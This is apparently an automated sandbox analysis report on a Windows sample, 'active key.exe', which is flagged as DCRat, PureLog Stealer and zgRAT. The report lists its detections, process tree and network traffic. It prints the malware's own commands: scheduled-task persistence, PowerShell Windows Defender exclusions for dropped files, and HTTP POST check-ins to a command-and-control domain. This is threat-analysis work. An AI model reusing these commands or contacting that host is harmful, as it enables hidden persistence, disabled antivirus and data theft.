Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
active key.exe

Overview

General Information

Sample name:active key.exe
Analysis ID:1502880
MD5:608de9b0cd5ec54b879965fddbbb9db6
SHA1:a3f0a61fd95098d0389f5e1f7f13850a19338e86
SHA256:03ee73148f5cbc60f1b281557d813ed9ba7a3097e99bdcf296df70a3777bd3c0
Tags:exe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Detected VMProtect packer
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to detect virtualization through RDTSC time measurements
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • active key.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\active key.exe" MD5: 608DE9B0CD5EC54B879965FDDBBB9DB6)
    • conhost.exe (PID: 1596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1668 cmdline: C:\Windows\system32\cmd.exe /c mode con cols=55 lines=15 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • mode.com (PID: 528 cmdline: mode con cols=55 lines=15 MD5: BEA7464830980BF7C0490307DB4FC875)
    • ntoskrnl2.exe (PID: 5012 cmdline: "C:\Windows\System32\ntoskrnl2.exe" MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
      • schtasks.exe (PID: 6060 cmdline: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 356 cmdline: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 8 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 5648 cmdline: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDv" /sc ONLOGON /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 1952 cmdline: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 9 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 3504 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7040 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 3160 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 6308 cmdline: schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 9 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 1404 cmdline: schtasks.exe /create /tn "ntoskrnl2" /sc ONLOGON /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 5356 cmdline: schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 5 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • powershell.exe (PID: 5504 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3940 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2348 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5676 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6060 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\backgroundTaskHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7940 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 5112 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7312 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7632 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • PING.EXE (PID: 7844 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
    • cmd.exe (PID: 5648 cmdline: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 | find /i /v "md5" | find /i /v "certutil" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • certutil.exe (PID: 356 cmdline: certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 MD5: F17616EC0522FC5633151F7CAA278CAA)
      • find.exe (PID: 3816 cmdline: find /i /v "md5" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • find.exe (PID: 5704 cmdline: find /i /v "certutil" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • explorer.exe (PID: 7200 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe" MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • explorer.exe (PID: 7224 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe" MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • ntoskrnl2.exe (PID: 7552 cmdline: C:\Windows\System32\ntoskrnl2.exe MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • ntoskrnl2.exe (PID: 7652 cmdline: C:\Windows\System32\ntoskrnl2.exe MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Process Memory Space: ntoskrnl2.exe PID: 5012JoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.ntoskrnl2.exe.1b180000.4.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              5.2.ntoskrnl2.exe.1b180000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                5.2.ntoskrnl2.exe.1b180000.4.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  5.2.ntoskrnl2.exe.1b180000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\ntoskrnl2.exe, ProcessId: 5012, TargetFilename: C:\Users\Public\Pictures\backgroundTaskHost.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\ntoskrnl2.exe" , ParentImage: C:\Windows\System32\ntoskrnl2.exe, ParentProcessId: 5012, ParentProcessName: ntoskrnl2.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', ProcessId: 5504, ProcessName: powershell.exe
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe", CommandLine: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe, NewProcessName: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe, OriginalFileName: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe", ProcessId: 7200, ProcessName: explorer.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\ntoskrnl2.exe" , ParentImage: C:\Windows\System32\ntoskrnl2.exe, ParentProcessId: 5012, ParentProcessName: ntoskrnl2.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', ProcessId: 5504, ProcessName: powershell.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, CommandLine: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f, ParentImage: C:\Windows\System32\schtasks.exe, ParentProcessId: 6060, ParentProcessName: schtasks.exe, ProcessCommandLine: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, ProcessId: 3504, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\ntoskrnl2.exe" , ParentImage: C:\Windows\System32\ntoskrnl2.exe, ParentProcessId: 5012, ParentProcessName: ntoskrnl2.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', ProcessId: 5504, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Schedule system process
                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, CommandLine: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f, ParentImage: C:\Windows\System32\schtasks.exe, ParentProcessId: 6060, ParentProcessName: schtasks.exe, ProcessCommandLine: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, ProcessId: 3504, ProcessName: schtasks.exe

                    Suricata Signatures

                    Timestamp:2024-09-02T13:33:41.567921+0200
                    SID:2048095
                    Severity:1
                    Source Port:49732
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: active key.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.phpAvira URL Cloud: Label: phishing
                    Antivirus detection for dropped file
                    Source: C:\Users\Public\Pictures\backgroundTaskHost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\Desktop\ZHsakaRB.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Windows\System32\ntoskrnl2.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.batAvira: detection malicious, Label: BAT/Delbat.C
                    Source: C:\Users\user\Desktop\mlzPodne.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Windows\tracing\fontdrvhost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Multi AV Scanner detection for domain / URL
                    Source: 128538cm.n9shteam3.topVirustotal: Detection: 12%Perma Link
                    Source: http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.phpVirustotal: Detection: 9%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeReversingLabs: Detection: 87%
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeVirustotal: Detection: 75%Perma Link
                    Source: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exeReversingLabs: Detection: 87%
                    Source: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exeVirustotal: Detection: 75%Perma Link
                    Source: C:\Users\Public\Pictures\backgroundTaskHost.exeReversingLabs: Detection: 87%
                    Source: C:\Users\Public\Pictures\backgroundTaskHost.exeVirustotal: Detection: 75%Perma Link
                    Source: C:\Users\user\Desktop\DnHERPdP.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\DnHERPdP.logVirustotal: Detection: 28%Perma Link
                    Source: C:\Users\user\Desktop\UZXJUHSP.logVirustotal: Detection: 10%Perma Link
                    Source: C:\Users\user\Desktop\ZHsakaRB.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\ZHsakaRB.logVirustotal: Detection: 28%Perma Link
                    Source: C:\Users\user\Desktop\aAtQiRdB.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\aAtQiRdB.logVirustotal: Detection: 28%Perma Link
                    Source: C:\Users\user\Desktop\hCHhiobl.logVirustotal: Detection: 10%Perma Link
                    Source: C:\Users\user\Desktop\mlzPodne.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\mlzPodne.logVirustotal: Detection: 28%Perma Link
                    Source: C:\Windows\System32\ntoskrnl2.exeReversingLabs: Detection: 87%
                    Source: C:\Windows\System32\ntoskrnl2.exeVirustotal: Detection: 75%Perma Link
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeReversingLabs: Detection: 87%
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeVirustotal: Detection: 75%Perma Link
                    Source: C:\Windows\tracing\fontdrvhost.exeReversingLabs: Detection: 87%
                    Source: C:\Windows\tracing\fontdrvhost.exeVirustotal: Detection: 75%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: active key.exeReversingLabs: Detection: 68%
                    Source: active key.exeVirustotal: Detection: 67%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\Public\Pictures\backgroundTaskHost.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\ZHsakaRB.logJoe Sandbox ML: detected
                    Source: C:\Windows\System32\ntoskrnl2.exeJoe Sandbox ML: detected
                    Source: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exeJoe Sandbox ML: detected
                    Source: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\hCHhiobl.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\UZXJUHSP.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\mlzPodne.logJoe Sandbox ML: detected
                    Source: C:\Windows\tracing\fontdrvhost.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: active key.exeJoe Sandbox ML: detected
                    Source: active key.exe, 00000000.00000000.2228522712.00007FF6E959B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_da45acf7-9
                    Source: C:\Windows\System32\ntoskrnl2.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\7a0fd90576e088Jump to behavior
                    Source: unknownHTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.6:49727 version: TLS 1.2
                    Source: active key.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49732 -> 80.211.144.156:80
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: Joe Sandbox ViewIP Address: 104.26.0.5 104.26.0.5
                    Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                    Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                    Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 380Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
